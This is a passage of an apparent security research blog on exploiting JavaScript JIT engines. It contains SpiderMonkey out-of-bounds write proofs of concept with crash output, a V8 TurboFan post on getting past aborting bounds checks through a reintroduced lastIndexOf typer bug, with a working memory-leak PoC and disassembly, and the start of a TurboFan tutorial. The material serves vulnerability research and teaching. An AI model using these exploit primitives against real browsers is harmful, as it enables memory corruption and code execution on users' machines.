return Arr[Idx];
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7);
Arr.fill(1337);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x0);
}

Trigger = true;
const Ret = Target(Snowflake, 0x5);
if(Ret === undefined) {
print(':( not vulnerable');
} else {
print(':) vulnerable');
}
}

main();


Can you write something bigger than a simple uint32?

In the blogpost, we focused on the integer JSValue out-of-bounds write, but you can also use it to store an arbitrary qword. Here is an example writing 0x44332211deadbeef!

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
Arr[Idx] = 4e-324;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x21);
Arr.fill(0);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0, 5e-324);
}

Trigger = true;
Target(Snowflake, 0x20, 352943125510189150000);
}

main();


And here is the crash you should get eventually:

(e08.36ac): Access violation - code c0000005 (!!! second chance !!!)
mozglue!arena_dalloc+0x11:
00007ffc773323a1 488b3e          mov     rdi,qword ptr [rsi] ds:44332211dea00000=????????????????

0:000> dv /v aPtr
@rcx                         aPtr = 0x44332211deadbeef
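
If you want to pick your own qword, the decimal literal passed to Target is just the double whose IEEE-754 bit pattern is the value you want in memory. Below is a small sketch of that conversion using a DataView; the helper names qwordToDouble and doubleToQword are mine. Keep in mind this is an assumption-laden illustration: bit patterns that decode to NaN, or that collide with the engine's tagged js::Value range, cannot be expressed as a plain double this way.

```javascript
// Reinterpret a 64-bit pattern as an IEEE-754 double.
function qwordToDouble(qword) {
  const view = new DataView(new ArrayBuffer(8));
  view.setBigUint64(0, qword); // same (big-endian) byte order for both accesses
  return view.getFloat64(0);
}

// Reinterpret a double as its 64-bit pattern.
function doubleToQword(value) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, value);
  return view.getBigUint64(0);
}

console.log(doubleToQword(1.0).toString(16)); // 3ff0000000000000
console.log(doubleToQword(5e-324));           // 1n, the smallest subnormal double
console.log(qwordToDouble(0x44332211deadbeefn));
```

The last line prints the double to hand to Target if you want 0x44332211deadbeef written out-of-bounds, which is the value used in the PoC above.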


Why does using 0xdeadbeef as a value trigger a bailout?

let Arr = null;
function AccessArray(Idx, Value) {
Arr[Idx] = Value;
}

Arr = new Array(0x100);
for(let Idx = 0; Idx < 0x400; Idx++) {
AccessArray(1, 0xaa);
}

AccessArray(1, 0xdeadbeef);



Circumventing Chrome's hardening of typer bugs

9 May 2019 at 15:00

Introduction

Some recent Chrome exploits were taking advantage of Bounds-Check-Elimination in order to get a R/W primitive from a TurboFan typer bug (a bug that incorrectly computes type information during code optimization). Indeed, during the simplified lowering phase, when visiting a CheckBounds node, if the engine can guarantee that the used index is always in-bounds then the CheckBounds is considered redundant and thus removed. I explained this in my previous article. Recently, TurboFan introduced a change that adds aborting bound checks. It means that CheckBounds will never get removed during simplified lowering. As mentioned by Mark Brand's article on the Google Project Zero blog and tsuro in his zer0con talk, this could be problematic for exploitation. This short post discusses the hardening change and how to exploit typer bugs against the latest versions of v8. As an example, I provide a sample exploit that works on v8 7.5.0.

Introduction of aborting bound checks

Aborting bounds checks have been introduced by the following commit:

commit 7bb6dc0e06fa158df508bc8997f0fce4e33512a5
Author: Jaroslav Sevcik <[email protected]>
Date:   Fri Feb 8 16:26:18 2019 +0100

[turbofan] Introduce aborting bounds checks.

Instead of eliminating bounds checks based on types, we introduce
an aborting bounds check that crashes rather than deopts.

Bug: v8:8806
Commit-Queue: Jaroslav Sevcik <[email protected]>
Reviewed-by: Tobias Tebbi <[email protected]>


Simplified lowering

First, what has changed is the CheckBounds node visitor of simplified-lowering.cc:

  void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
CheckParameters const& p = CheckParametersOf(node->op());
Type const index_type = TypeOf(node->InputAt(0));
Type const length_type = TypeOf(node->InputAt(1));
if (length_type.Is(Type::Unsigned31())) {
if (index_type.Is(Type::Integral32OrMinusZero())) {
// Map -0 to 0, and the values in the [-2^31,-1] range to the
// [2^31,2^32-1] range, which will be considered out-of-bounds
// as well, because the {length_type} is limited to Unsigned31.
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
if (lower()) {
CheckBoundsParameters::Mode mode =
CheckBoundsParameters::kDeoptOnOutOfBounds;
if (lowering->poisoning_level_ ==
PoisoningMitigationLevel::kDontPoison &&
(index_type.IsNone() || length_type.IsNone() ||
(index_type.Min() >= 0.0 &&
index_type.Max() < length_type.Min()))) {
// The bounds check is redundant if we already know that
// the index is within the bounds of [0.0, length[.
mode = CheckBoundsParameters::kAbortOnOutOfBounds;         // [1]
}
NodeProperties::ChangeOp(
node, simplified()->CheckedUint32Bounds(p.feedback(), mode)); // [2]
}
// [...]
}


Before the commit, if condition [1] was satisfied, the bound check would have been removed using a call to DeferReplacement(node, node->InputAt(0));. Now, what happens instead is that the node gets lowered to a CheckedUint32Bounds with the kAbortOnOutOfBounds mode [2].

Effect linearization

When the effect control linearizer (one of the optimization phases) kicks in, here is how the CheckedUint32Bounds gets lowered:

Node* EffectControlLinearizer::LowerCheckedUint32Bounds(Node* node,
Node* frame_state) {
Node* index = node->InputAt(0);
Node* limit = node->InputAt(1);
const CheckBoundsParameters& params = CheckBoundsParametersOf(node->op());

Node* check = __ Uint32LessThan(index, limit);
switch (params.mode()) {
case CheckBoundsParameters::kDeoptOnOutOfBounds:
__ DeoptimizeIfNot(DeoptimizeReason::kOutOfBounds,
params.check_parameters().feedback(), check,
frame_state, IsSafetyCheck::kCriticalSafetyCheck);
break;
case CheckBoundsParameters::kAbortOnOutOfBounds: {
auto if_abort = __ MakeDeferredLabel();
auto done = __ MakeLabel();

__ Branch(check, &done, &if_abort);

__ Bind(&if_abort);
__ Unreachable();
__ Goto(&done);

__ Bind(&done);
break;
}
}

return index;
}


Long story short, the CheckedUint32Bounds is replaced by a Uint32LessThan node (plus the index and limit nodes). In the case of an out-of-bounds access with the aborting mode, no deoptimization is possible; instead we reach an Unreachable node.

During instruction selection Unreachable nodes are replaced by breakpoint opcodes.

void InstructionSelector::VisitUnreachable(Node* node) {
OperandGenerator g(this);
Emit(kArchDebugBreak, g.NoOutput());
}
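
To summarize the two lowering modes, here is a toy JavaScript model of what the generated code ends up doing at runtime. This is only a sketch of the behaviour described above, not V8 code: the function name, the mode strings and the returned objects are all invented for the illustration.

```javascript
// Toy model of a lowered CheckedUint32Bounds. `mode` is either "deopt"
// (kDeoptOnOutOfBounds) or "abort" (kAbortOnOutOfBounds).
function checkedUint32Bounds(index, limit, mode) {
  // Uint32LessThan: both operands are compared as unsigned 32-bit integers.
  const inBounds = (index >>> 0) < (limit >>> 0);
  if (inBounds) {
    return { outcome: "ok", index };
  }
  if (mode === "deopt") {
    // DeoptimizeIfNot: execution falls back to unoptimized code.
    return { outcome: "deoptimize" };
  }
  // Unreachable node, later emitted as a breakpoint instruction.
  return { outcome: "abort" };
}

console.log(checkedUint32Bounds(1, 4, "abort").outcome); // ok
console.log(checkedUint32Bounds(5, 4, "deopt").outcome); // deoptimize
console.log(checkedUint32Bounds(5, 4, "abort").outcome); // abort
```

The important difference for an attacker is the last case: with the aborting mode, a wrong type no longer gives an unchecked access, it gives a crash.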


Experimenting

Ordinary behaviour

Let's first experiment with some normal behaviour in order to get a grasp of what happens with bound checking. Consider the following code.

var opt_me = () => {
let arr = [1,2,3,4];
let badly_typed = 0;
let idx = badly_typed * 5;
return arr[idx];
};
opt_me();
%OptimizeFunctionOnNextCall(opt_me);
opt_me();


With this example, we're going to observe a few things:

• simplified lowering does not remove the CheckBounds node as it would have before,
• the lowering of this node and how it leads to the creation of an Unreachable node,
• eventually, bound checking will get completely removed (which is correct and expected).

Typing of a CheckBounds

Unsurprisingly, a CheckBounds node is generated and gets a type of Range(0,0) during the typer phase.

CheckBounds lowering to CheckedUint32Bounds

The CheckBounds node is not removed during simplified lowering the way it would have been before. It is lowered to a CheckedUint32Bounds instead.

Effect Linearization : CheckedUint32Bounds to Uint32LessThan with Unreachable

Let's have a look at the effect linearization.

The CheckedUint32Bounds is replaced by several nodes. Instead of this bound checking node, there is a Uint32LessThan node that either leads to a LoadElement node or an Unreachable node.

Late optimization : MachineOperatorReducer and DeadCodeElimination

It seems pretty obvious that the Uint32LessThan can be lowered to a constant true (Int32Constant). In the case of Uint32LessThan being replaced by a constant node the rest of the code, including the Unreachable node, will be removed by the dead code elimination. Therefore, no bounds check remains and no breakpoint will ever be reached, regardless of any OOB accesses that are attempted.

// Perform constant folding and strength reduction on machine operators.
Reduction MachineOperatorReducer::Reduce(Node* node) {
switch (node->opcode()) {
// [...]
case IrOpcode::kUint32LessThan: {
Uint32BinopMatcher m(node);
if (m.left().Is(kMaxUInt32)) return ReplaceBool(false);  // M < x => false
if (m.right().Is(0)) return ReplaceBool(false);          // x < 0 => false
if (m.IsFoldable()) {                                    // K < K => K
return ReplaceBool(m.left().Value() < m.right().Value());
}
if (m.LeftEqualsRight()) return ReplaceBool(false);  // x < x => false
if (m.left().IsWord32Sar() && m.right().HasValue()) {
Int32BinopMatcher mleft(m.left().node());
if (mleft.right().HasValue()) {
// (x >> K) < C => x < (C << K)
// when C < (M >> K)
const uint32_t c = m.right().Value();
const uint32_t k = mleft.right().Value() & 0x1F;
if (c < static_cast<uint32_t>(kMaxInt >> k)) {
node->ReplaceInput(0, mleft.left().node());
node->ReplaceInput(1, Uint32Constant(c << k));
return Changed(node);
}
// TODO(turbofan): else the comparison is always true.
}
}
break;
}
// [...]
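
If it helps, here is a simplified JavaScript model of the folding rules shown above, applied to our example where the index is the constant 0 and the length is the constant 4. It is a sketch under my own assumptions: operands are modeled as either { constant: n } or { name: "x" }, the Word32Sar strength reduction is left out, and the function returns null when no rule applies.

```javascript
const K_MAX_UINT32 = 0xffffffff;

// Simplified model of the kUint32LessThan case of the reducer above.
// Returns true/false when the comparison folds to a constant, null otherwise.
function reduceUint32LessThan(left, right) {
  const isConst = (n) => typeof n.constant === "number";
  if (isConst(left) && left.constant === K_MAX_UINT32) return false; // M < x => false
  if (isConst(right) && right.constant === 0) return false;          // x < 0 => false
  if (isConst(left) && isConst(right)) {                             // K < K => K
    return (left.constant >>> 0) < (right.constant >>> 0);
  }
  if (!isConst(left) && !isConst(right) && left.name === right.name) {
    return false;                                                    // x < x => false
  }
  return null; // nothing to fold
}

// Index 0 against a length of 4: folds to true, so the Unreachable branch is dead.
console.log(reduceUint32LessThan({ constant: 0 }, { constant: 4 })); // true
// A non-constant index cannot be folded by these rules.
console.log(reduceUint32LessThan({ name: "idx" }, { constant: 4 })); // null
```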


Final scheduling : no more bound checking

To observe the generated code, let's first look at the final scheduling phase and confirm that eventually, only a Load at index 0 remains.

Generated assembly code

In this case, TurboFan correctly understood that no bound checking was necessary and simply generated a mov instruction movq rax, [fixed_array_base + offset_to_element_0].

To sum up :

1. arr[good_idx] leads to the creation of a CheckBounds node in the early phases
2. during "simplified lowering", it gets replaced by an aborting CheckedUint32Bounds
3. The CheckedUint32Bounds gets replaced by several nodes during "effect linearization" : Uint32LessThan and Unreachable
4. Uint32LessThan is constant folded during the "Late Optimization" phase
5. The Unreachable node is removed during dead code elimination of the "Late Optimization" phase
6. Only a simple Load remains during the final scheduling
7. Generated assembly is a simple mov instruction without bound checking

Typer bug

Let's consider the String#lastIndexOf bug where the typing of kStringIndexOf and kStringLastIndexOf is incorrect. The computed type is: Type::Range(-1.0, String::kMaxLength - 1.0, t->zone()) instead of Type::Range(-1.0, String::kMaxLength, t->zone()). This is incorrect because both String#indexOf and String#lastIndexOf can return a value of kMaxLength. You can find more details about this bug on my github.

This bug is exploitable even with the introduction of aborting bound checks. So let's reintroduce it on v8 7.5 and exploit it.

In summary, if we use lastIndexOf on a string with a length of kMaxLength, the computed Range type will be kMaxLength - 1 while it is actually kMaxLength.

const str = "____"+"DOARE".repeat(214748359);
String.prototype.lastIndexOf.call(str, ''); // typed as kMaxLength-1 instead of kMaxLength


We can then amplify this typing error.

  let badly_typed = String.prototype.lastIndexOf.call(str, '');
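
To see why an off-by-one in a range can be turned into something usable, here is a worked example with plain arithmetic (no giant string needed). The `>> 30` and the multiplication by 5 match the comments in the disassembly further below; the `+ 25` step is an assumption on my side, chosen because the string length plus 25 is exactly 2^30.

```javascript
// Length of the string built above: "____" + "DOARE".repeat(214748359).
const strLength = "____".length + "DOARE".length * 214748359;

const typedMax = strLength - 1; // upper bound the buggy typer computes
const actualMax = strLength;    // value lastIndexOf('') actually returns

// Assumed amplification: push the real value over 2^30, then shift.
const amplify = (x) => (x + 25) >> 30;

console.log(strLength);               // 1073741799
console.log(strLength + 25 === 2 ** 30); // true
console.log(amplify(typedMax));       // 0: what TurboFan believes
console.log(amplify(actualMax));      // 1: what really happens at runtime
console.log(amplify(actualMax) * 5);  // 5: real index, typed as Range(0,0)
```

So the compiler reasons about an index it believes is always 0, while the value at runtime is 5.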


If all of this seems unclear, check my previous introduction to TurboFan and my github.

Now, consider the following trigger poc :

SUCCESS = 0;
FAILURE = 0x42;

const str = "____"+"DOARE".repeat(214748359);

let it = 0;

var opt_me = () => {
const OOB_OFFSET = 5;

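let badly_typed = String.prototype.lastIndexOf.call(str, '');
// [...] amplification of the typing error, ending with badly_typed >> 30
let bad = badly_typed * OOB_OFFSET;
let leak = 0;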

if (bad >= OOB_OFFSET && ++it < 0x10000) {
leak = 0;
}
else {
let arr = new Array(1.1,1.1);
arr2 = new Array({},{});
leak = arr[bad];
if (leak != undefined) {
return leak;
}
}
return FAILURE;
};

let res = opt_me();
for (let i = 0; i < 0x10000; ++i)
res = opt_me();
%DisassembleFunction(opt_me); // prints nothing on release builds
for (let i = 0; i < 0x10000; ++i)
res = opt_me();
print(res);
%DisassembleFunction(opt_me); // prints nothing on release builds


Check out the result:

$ d8 poc.js
1.5577100569205e-310

It worked despite those aborting bound checks. Why? The line leak = arr[bad] didn't lead to any CheckBounds elimination and yet we didn't execute any Unreachable node (aka breakpoint instruction).

Native context specialization of an element access

The answer lies in the native context specialization. This is one of the early optimization phases where the compiler is given the opportunity to specialize code in a way that capitalizes on its knowledge of the context in which the code will execute.

One of the first optimization phases is the inlining phase, which includes native context specialization. For element accesses, the context specialization is done in JSNativeContextSpecialization::BuildElementAccess.

There is one case that looks very interesting when the load_mode is LOAD_IGNORE_OUT_OF_BOUNDS.

    } else if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&
               CanTreatHoleAsUndefined(receiver_maps)) {
      // Check that the {index} is a valid array index, we do the actual
      // bounds check below and just skip the store below if it's out of
      // bounds for the {receiver}.
      index = effect = graph()->NewNode(
          simplified()->CheckBounds(VectorSlotPair()), index,
          jsgraph()->Constant(Smi::kMaxValue), effect, control);
    } else {

In this case, the CheckBounds node checks the index against a length of Smi::kMaxValue.

The actual bound checking nodes are added as follows:

      if (load_mode == LOAD_IGNORE_OUT_OF_BOUNDS &&
          CanTreatHoleAsUndefined(receiver_maps)) {
        Node* check =
            graph()->NewNode(simplified()->NumberLessThan(), index, length); // [1]
        Node* branch = graph()->NewNode(
            common()->Branch(BranchHint::kTrue,
                             IsSafetyCheck::kCriticalSafetyCheck),
            check, control);

        Node* if_true = graph()->NewNode(common()->IfTrue(), branch); // [2]
        Node* etrue = effect;
        Node* vtrue;
        {
          // Perform the actual load
          vtrue = etrue =
              graph()->NewNode(simplified()->LoadElement(element_access), // [3]
                               elements, index, etrue, if_true);

        // [...]
        }

      // [...]
      }

In a nutshell, with this mode:

• CheckBounds checks the index against Smi::kMaxValue (0x7FFFFFFF),
• A NumberLessThan node is generated,
• An IfTrue node is generated,
• In the "true" branch, there will be a LoadElement node.

The length used by the NumberLessThan node comes from a previously generated LoadField:

    Node* length = effect =
        receiver_is_jsarray
            ? graph()->NewNode(
                  simplified()->LoadField(
                      AccessBuilder::ForJSArrayLength(elements_kind)),
                  receiver, effect, control)
            : graph()->NewNode(
                  simplified()->LoadField(AccessBuilder::ForFixedArrayLength()),
                  elements, effect, control);

All of this means that TurboFan does generate some bound checking nodes but there won't be any aborting bound check because of the kMaxValue length being used (well technically there is, but the maximum length is unlikely to be reached!).

Type narrowing and constant folding of NumberLessThan

After the typer phase, the sea of nodes contains a NumberLessThan that compares a badly typed value to the correct array length. This is interesting because the TypeNarrowingReducer is going to change the type [2] with op_typer_.singleton_true() [1].

    case IrOpcode::kNumberLessThan: {
      // TODO(turbofan) Reuse the logic from typer.cc (by integrating relational
      // comparisons with the operation typer).
      Type left_type = NodeProperties::GetType(node->InputAt(0));
      Type right_type = NodeProperties::GetType(node->InputAt(1));
      if (left_type.Is(Type::PlainNumber()) &&
          right_type.Is(Type::PlainNumber())) {
        if (left_type.Max() < right_type.Min()) {
          new_type = op_typer_.singleton_true(); // [1]
        } else if (left_type.Min() >= right_type.Max()) {
          new_type = op_typer_.singleton_false();
        }
      }
      break;
    }
  // [...]
  Type original_type = NodeProperties::GetType(node);
  Type restricted = Type::Intersect(new_type, original_type, zone());
  if (!original_type.Is(restricted)) {
    NodeProperties::SetType(node, restricted); // [2]
    return Changed(node);
  }

Thanks to that, the ConstantFoldingReducer will then simply remove the NumberLessThan node and replace it by a HeapConstant node.

Reduction ConstantFoldingReducer::Reduce(Node* node) {
  DisallowHeapAccess no_heap_access;
  // Check if the output type is a singleton.  In that case we already know the
  // result value and can simply replace the node if it's eliminable.
  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
      node->op()->HasProperty(Operator::kEliminatable)) {
    // TODO(v8:5303): We must not eliminate FinishRegion here. This special
    // case can be removed once we have separate operators for value and
    // effect regions.
    if (node->opcode() == IrOpcode::kFinishRegion) return NoChange();
    // We can only constant-fold nodes here, that are known to not cause any
    // side-effect, may it be a JavaScript observable side-effect or a possible
    // eager deoptimization exit (i.e. {node} has an operator that doesn't have
    // the Operator::kNoDeopt property).
    Type upper = NodeProperties::GetType(node);
    if (!upper.IsNone()) {
      Node* replacement = nullptr;
      if (upper.IsHeapConstant()) {
        replacement = jsgraph()->Constant(upper.AsHeapConstant()->Ref());
      } else if (upper.Is(Type::MinusZero())) {
        Factory* factory = jsgraph()->isolate()->factory();
        ObjectRef minus_zero(broker(), factory->minus_zero_value());
        replacement = jsgraph()->Constant(minus_zero);
      } else if (upper.Is(Type::NaN())) {
        replacement = jsgraph()->NaNConstant();
      } else if (upper.Is(Type::Null())) {
        replacement = jsgraph()->NullConstant();
      } else if (upper.Is(Type::PlainNumber()) && upper.Min() == upper.Max()) {
        replacement = jsgraph()->Constant(upper.Min());
      } else if (upper.Is(Type::Undefined())) {
        replacement = jsgraph()->UndefinedConstant();
      }
      if (replacement) {
        // Make sure the node has a type.
        if (!NodeProperties::IsTyped(replacement)) {
          NodeProperties::SetType(replacement, upper);
        }
        ReplaceWithValue(node, replacement);
        return Changed(replacement);
      }
    }
  }
  return NoChange();
}

We confirm this behaviour using --trace-turbo-reduction:

- In-place update of 200: NumberLessThan(199, 225) by reducer TypeNarrowingReducer
- Replacement of 200: NumberLessThan(199, 225) with 94: HeapConstant[0x2584e3440659 <true>] by reducer ConstantFoldingReducer

At this point, there isn't any proper bound check left.

Observing the generated assembly

Let's run the previous poc again. We'll disassemble the function twice.

The first optimized code we can observe contains code related to:

• a CheckBounds with a length of Smi::kMaxValue,
• a bound check with a NumberLessThan with the correct length.
===== FIRST DISASSEMBLY =====

0x11afad03119   119  41c1f91e        sarl r9, 30                 // badly_typed >> 30
0x11afad0311d   11d  478d0c89        leal r9,[r9+r9*4]           // badly_typed * OOB_OFFSET

0x11afad03239   239  4c894de0        REX.W movq [rbp-0x20],r9

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)
0x11afad0326f   26f  817de0ffffff7f  cmpl [rbp-0x20],0x7fffffff
0x11afad03276   276  0f830c010000    jnc 0x11afad03388  <+0x388> // go to Unreachable

// NumberLessThan (badly_typed, LoadField(array.length) = 2)
0x11afad0327c   27c  837de002        cmpl [rbp-0x20],0x2
0x11afad03280   280  0f8308010000    jnc 0x11afad0338e  <+0x38e>

// LoadElement
0x11afad03286   286  4c8b45e8        REX.W movq r8,[rbp-0x18]    // FixedArray
0x11afad0328a   28a  4c8b4de0        REX.W movq r9,[rbp-0x20]    // badly_typed * OOB_OFFSET
0x11afad0328e   28e  c4817b1044c80f  vmovsd xmm0,[r8+r9*8+0xf]   // arr[bad]

// Unreachable
0x11afad03388   388  cc              int3l                       // Unreachable node

The second disassembly is much more interesting. Indeed, only the code corresponding to the CheckBounds remains. The actual bound check was removed!

===== SECOND DISASSEMBLY =====

0x2e987c30412f   10f  c1ff1e         sarl rdi, 30                // badly_typed >> 30
0x2e987c304132   112  4c8d4120       REX.W leaq r8,[rcx+0x20]
0x2e987c304136   116  8d3cbf         leal rdi,[rdi+rdi*4]        // badly_typed * OOB_OFFSET

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)
0x2e987c304270   250  81ffffffff7f   cmpl rdi,0x7fffffff
0x2e987c304276   256  0f83b9000000   jnc 0x2e987c304335  <+0x315>
0x2e987c30427c   25c  c5fb1044f90f   vmovsd xmm0,[rcx+rdi*8+0xf] // unchecked access!

0x2e987c304335   315  cc             int3l                       // Unreachable node

You can confirm it works by launching the full exploit on a patched 7.5 d8 shell.

Conclusion

As discussed in this article, the introduction of aborting CheckBounds kind of kills the CheckBound elimination technique for typer bug exploitation. However, we demonstrated a case where TurboFan would defer the bound checking to a NumberLessThan node that would then be incorrectly constant folded because of a bad typing.

Thanks for reading this. Please feel free to shoot me any feedback via my twitter: @__x86.

Special thanks to my friends Axel Souchet, yrp604 and Georgi Geshev for their review.

Also, if you're interested in TurboFan, don't miss my upcoming typhooncon talk!

A bit before publishing this post, saelo released a new phrack article on jit exploitation as well as the slides of his 0x41con talk.

References

Introduction to TurboFan

28 January 2019 at 16:00

Introduction

Ages ago I wrote a blog post here called first dip in the kernel pool, this year we're going to swim in a sea of nodes!

The current trend is to attack JavaScript engines and more specifically, optimizing JIT compilers such as V8's TurboFan, SpiderMonkey's IonMonkey, JavaScriptCore's Data Flow Graph (DFG) & Faster Than Light (FTL) or Chakra's Simple JIT & FullJIT.

In this article we're going to discuss TurboFan and play along with the sea of nodes structure it uses.

Then, we'll study a vulnerable optimization pass written by @_tsuro for Google's CTF 2018 and write an exploit for it. We'll be doing that on an x64 Linux box but it really is the exact same exploitation for Windows platforms (simply use a different shellcode!).

If you want to follow along, you can check out the associated repo.

Setup

Building v8

Building v8 is very easy. You can simply fetch the sources using depot tools and then build using the following commands:

fetch v8
gclient sync
./build/install-build-deps.sh
tools/dev/gm.py x64.release

Please note that whenever you're updating the sources or checking out a specific commit, do gclient sync or you might be unable to build properly.

The d8 shell

A very convenient shell called d8 is provided with the engine. For faster builds, limit the compilation to this shell:

~/v8$ ./tools/dev/gm.py x64.release d8


Try it:

~/v8$ ./out/x64.release/d8
V8 version 7.3.0 (candidate)
d8> print("hello doare")
hello doare

Many interesting flags are available. List them using d8 --help.

In particular, v8 comes with runtime functions that you can call from JavaScript using the % prefix. To enable this syntax, you need to use the flag --allow-natives-syntax. Here is an example:

$ d8 --allow-natives-syntax
V8 version 7.3.0 (candidate)
d8> let a = new Array('d','o','a','r','e')
undefined
d8> %DebugPrint(a)
DebugPrint: 0x37599d40aee1: [JSArray]
- map: 0x01717e082d91 <Map(PACKED_ELEMENTS)> [FastProperties]
- prototype: 0x39ea1928fdb1 <JSArray[0]>
- elements: 0x37599d40af11 <FixedArray[5]> [PACKED_ELEMENTS]
- length: 5
- properties: 0x0dfc80380c19 <FixedArray[0]> {
#length: 0x3731486801a1 <AccessorInfo> (const accessor descriptor)
}
- elements: 0x37599d40af11 <FixedArray[5]> {
0: 0x39ea1929d8d9 <String[#1]: d>
1: 0x39ea1929d8f1 <String[#1]: o>
2: 0x39ea1929d8c1 <String[#1]: a>
3: 0x39ea1929d909 <String[#1]: r>
4: 0x39ea1929d921 <String[#1]: e>
}
0x1717e082d91: [Map]
- type: JS_ARRAY_TYPE
- instance size: 32
- inobject properties: 0
- elements kind: PACKED_ELEMENTS
- unused property fields: 0
- enum length: invalid
- back pointer: 0x01717e082d41 <Map(HOLEY_DOUBLE_ELEMENTS)>
- prototype_validity cell: 0x373148680601 <Cell value= 1>
- instance descriptors #1: 0x39ea192909f1 <DescriptorArray[1]>
- layout descriptor: (nil)
- transitions #1: 0x39ea192909c1 <TransitionArray[4]>
Transition array #1:
0x0dfc80384b71 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_ELEMENTS) -> 0x01717e082de1 <Map(HOLEY_ELEMENTS)>
- prototype: 0x39ea1928fdb1 <JSArray[0]>
- constructor: 0x39ea1928fb79 <JSFunction Array (sfi = 0x37314868ab01)>
- dependent code: 0x0dfc803802b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
- construction counter: 0

["d", "o", "a", "r", "e"]


If you want to know about existing runtime functions, simply go to src/runtime/ and grep for RUNTIME_FUNCTION (this is the macro used to declare a new runtime function).

Preparing Turbolizer

Turbolizer is a tool that we are going to use to debug TurboFan's sea of nodes graph.

cd tools/turbolizer
npm i
npm run-script build
python -m SimpleHTTPServer


When you execute a JavaScript file with --trace-turbo (use --trace-turbo-filter to limit to a specific function), a .cfg file and a .json file are generated so that you can get a graph view of the different optimization passes using Turbolizer.

Simply go to the web interface using your favourite browser (which is Chromium of course) and select the file from the interface.

Compilation pipeline

Let's take the following code.

let f = (o) => {
var obj = [1,2,3];
var x = Math.ceil(Math.random());
return obj[o+x];
}

for (let i = 0; i < 0x10000; ++i) {
f(i);
}


We can trace optimizations with --trace-opt and observe that the function f will eventually get optimized by TurboFan as you can see below.

$ d8 pipeline.js --trace-opt
[marking 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> for optimized recompilation, reason: small function, ICs with typeinfo: 4/4 (100%), generic ICs: 0/4 (0%)]
[marking 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 2/7 (28%)]
[compiling method 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> using TurboFan]
[optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> - took 23.583, 25.899, 0.444 ms]
[completed optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)>]
[compiling method 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> using TurboFan OSR]
[optimizing 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> - took 18.238, 87.603, 0.874 ms]

We can look at the code object of the function before and after optimization using %DisassembleFunction.

// before
0x17de4c02061: [Code]
- map: 0x0868f07009d9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown
address = 0x7ffd9c25d340

// after
0x17de4c82d81: [Code]
- map: 0x0868f07009d9 <Map>
kind = OPTIMIZED_FUNCTION
stack_slots = 8
compiler = turbofan
address = 0x7ffd9c25d340

What happens is that v8 first generates ignition bytecode. If the function gets executed a lot, TurboFan will generate some optimized code.

Ignition instructions gather type feedback that helps TurboFan's speculative optimizations. Speculative optimization means that the generated code relies on assumptions.

For instance, if we've got a function move that is always used to move an object of type Player, optimized code generated by TurboFan will expect Player objects and will be very fast for this case.

class Player{}
class Wall{}
function move(o) {
  // ...
}
player = new Player();
move(player)
move(player)
...
// ... optimize code! the move function handles very fast objects of type Player
move(player)

However, if 10 minutes later, for some reason, you move a Wall instead of a Player, that will break the assumptions originally made by TurboFan. The generated code was very fast, but could only handle Player objects. Therefore, the optimized code is thrown away and execution goes back to ignition bytecode. This is called deoptimization and it has a huge performance cost. If we keep moving both Wall and Player, TurboFan will take this into account and optimize the code again accordingly.

Let's observe this behaviour using --trace-opt and --trace-deopt!

class Player{}
class Wall{}

function move(obj) {
  var tmp = obj.x + 42;
  var x = Math.random();
  x += 1;
  return tmp + x;
}

for (var i = 0; i < 0x10000; ++i) {
  move(new Player());
}
move(new Wall());
for (var i = 0; i < 0x10000; ++i) {
  move(new Wall());
}

$ d8 deopt.js --trace-opt --trace-deopt
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 23.374, 15.701, 0.379 ms]
[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]
[deoptimizing (DEOPT eager): begin 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> (opt #0) @1, FP to SP delta: 24, caller sp: 0x7ffcd23cba98]
;;; deoptimize at <deopt.js:5:17>, wrong map
// [...]
[deoptimizing (eager): end 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> @1 => node=0, pc=0x7fa245e11e60, caller sp=0x7ffcd23cba98, took 0.755 ms]
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 11.599, 10.742, 0.573 ms]
